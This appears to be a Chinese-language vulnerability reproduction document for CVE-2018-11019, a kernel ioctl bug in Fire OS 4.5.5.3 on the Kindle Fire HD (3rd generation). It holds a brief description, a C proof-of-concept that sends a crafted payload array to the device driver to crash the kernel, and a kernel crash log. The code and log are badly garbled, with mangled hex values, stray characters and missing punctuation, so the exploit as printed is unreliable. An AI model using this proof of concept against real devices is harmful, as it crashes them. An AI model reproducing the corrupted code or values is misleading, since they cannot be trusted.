（CVE-2018-11019）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx

(CVE-2018-11019) Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞一、漏洞简介Amazon Kindle Fire HD (3rd)是美国亚马逊(AmaZOn)公司的一款 FireOS 平板 电脑设备。Fire OS是运行在其中的一套专用于AmaZOn设备的基于Android开发 的移动操作系统。kernel是其中的一个内核组件。Amazon Kindle Fire HD(3rd) Fire OS 4.5.5.3版本中的kernel组件的 kernel/omap/drivers/misc/gcx/gcioctl/gcif.c 文件存在安全漏洞。攻击者可借助 3221773726命令利用该漏洞注入特制的参数，造成内核崩溃。二、漏洞影响Fire OS 4.5.5.3三、复现过程poc /* This is poc of Kindle Fire HD 3rd* A bug in the ioctl interface of device file devdsscomp causes the system crash via IOCTL 1118064517.* Related buggy struct name is dsscomp_setup_dispc_data.* This Poc should run with permission to do ioctl on devdsscomp.* The -Fowllwing is kmsg of kernel crash infomation:* */#include <stdio.h>#include <fcntl.h>#include <errno.h>#include <sysioctl.h>const static char *driver = "devdsscomp" static command = 1118064517;int main(int argc, char *argv, char *env) unsigned int payload = Oxffffffffj 0X00000003j 0×5d200040, 0x79900008, 0x8f5928bd,0x78b02422, 0X00000000j 0ffffffff, 0xf4c50400, 0×007fffff, 08499f562, 0×ffff0400, 0×001bl31dj 0x60818210, 0X00000007, 0×ffffffff, 0X00000000 0x9da9041c, 0×cd980400, 0×001f03f4, 0x00000007, 0x2a34003f, 0×7c80d8f3, 0x63102627, 0xc73643a8, 0xa28f0665, 0X00000000j 0×689e57b4j 0x01ff0008, 0x5e7324bl, 0xae3b003f, 0x0bl74d86, 0X00000400, 0x2Iffff37, 0xceb367a4j 0x00000040, 0x00000001j 0xec000f9ej 0×00000001, 0x00000Iff, 0X00000000, 0×00000000, 0×0000000f 0×0425c069j 0x038cc3bej 0×0000000f, 0x00000080, 0xe5790100, 0×5blbffff, 0×0000d355, 0x0000c685, 0xa0070000, 0×0010ffff, 0x00a0ff00, 0×00000001,0xff490700j 0x0832ad03, 0x00000006 0X00000002, 0×00000001j 0x81f871C0, 0x738019cbj 0xbf47ffff, 0×00000040j 0X00000001, x7fl90f33, 0X00000001, 0x8295769b, 0X0000003f, 0x869f2295, 0×ffffffffj 0xd673914fj 0x05055800, 0xed69b7d5j 0X00000000, 0xl07ebbd, 0xd214af8dj 0xffff4a93, 0x26450008, 0x58df0000j 0×dl6db084j 0x03ff30dd, 0X00000001, 0x209aff3b, 0xe7850800j 0x00000002, 0x30da815cj 0x426f5105, 0×0del09d7j 0×2cla65fcj 0×fcb3d75f, 0X00000000, 0X00000001, 0×8066be5b 0X00000002, 0×ffffffffj 0x5cf232ecj 0x680dl469, 0X00000001 0X00000020, 0×ffffffff, 0X00000400, 0xdldl2be8j 0X02010200, 0×01ffcl6f,0xf6e237e6, 0x007f0000, 0×01ff08f8, 0×000f00f9j 0xbad07695, 0X00000000j 0xbaff0000, 0x24040040, 0X00000006 0X00000004, 0X00000000, 0xbc2e9242, 0x009f5f08, 0x00800000? 0X00000000j 0×00000001, 0xff8800ff, 0X00000001, 0X00000000, 0×000003f4, 0x6faa8472, 0X00000400j 0×ec857dd5, 0x00000000, 0x00000040, 0xffffffff, 0x3f004874, 0x0000b77a, 0xec9acb95, 0xfacc0001 0xffff0001, 0×0080ffff, 0x3600ff03, 0×00000001, 0x8fff7d7f, 0x6b87075a, 0X00000000, 0X41414141, 0×41414141j 0×41414141, 0x41414141, 0X00100Iff, 0X00000000j 0X00000001j 0×fflf0512, 0X00000001j 0x51e32167, 0xcl8c55ccj 0X00000000? 0xffffffff,0xb4aafl2b 0x86edfdbd, 0X00000010, 0×0000003fj 0×abff7b00, 0xffff9ea3j 0xb28e0040, 0x000fffff, 0x458603f4, 0×ffff007f, 0xa9030f02, 0X00000001j 0x002Cffff, 0×9e00cdffj 0×00000004j0×41414141, 0×41414141, 0x41414141, 0x41414141 ；int fd = 0;fd = open(driverj O_RDWR);if (fd < 0) printf("Failed to open %sj with errno %dn”, driverj errno);system(',echo 1 > datalocaltmplog");return -1;)printf("Try open %s with command 0x%x.n”, driver, command); printf("System will crash and reboot.n");if(ioctl(fdj command, Spayload) < 0) printf("Allocation of structs failed, %dr, errno);system("echo 2 > datalocaltmplog");return -1;close(fd);return 0;崩溃日志164.793151 Unable to handle kernel NULL pointer dereference at virt ual address 00000037164.802459164.805664164.813415164.819458164.8272391)164.834686164.839416pgd = c26ec00000000037 *pgd=82f42831, *pte=00000000j *ppte=00000000Internal error: Oops: 17 #1 PREEMPT SMP ARMModules linked in: omaplfb(0) pvrsrvkm(O) pvr_logger(0)CPU: 1Tainted: GO (3.4.83-gd2afc0bae69 #PC is at LR is atdev-ioctl+0×4ac0xl0c4down_timeout+0x40/0x5c164.844146164.844146164.857116164.863128 0f164.870391 00PC : SP : 0: r7 :r3 :<c03178e8>c25ale70 00000000 C0a25b5000001403Ir : <c006e9b8>psr: 60000013iP r9 r6:c25ale50:d8caca8 :c25a0000：00000000164.877807 Flags: nZCv IRQs on ment userfp : c25alf04r8 : bed5c610r5 : bed5c610 r4 : 000000rl : 20000013 r0 : 000000FIQs on Mode SVC_32 ISA ARM Seg164.885894 Control: 10c5387d Table: 826ec04a DAC: 00000015164.892303164.892333 PC: 0xc0317868:164.897308 7868 30d22003 f02 ela0200d e3c26d7f33a03000e35300000a0001c5e3e0500deafff164.907989 7888 e3c6603f 000 la000021 e24b3064e5963008e295200830d2200333a03000e3530164.918670 78a8 ela01005000 la00001e e51b4060e3a02008e50b3088ela00003ebfcfa5fe3500164.929351 78c8 e3020710 c25 e3500000 Ia0002e0e59f7bdcebf4db32ela010002870038ebf55164.939880 78e8 e5943028 004 e5830000 e5b23070ela08000e5940024ela02007e2841024e5803164.950561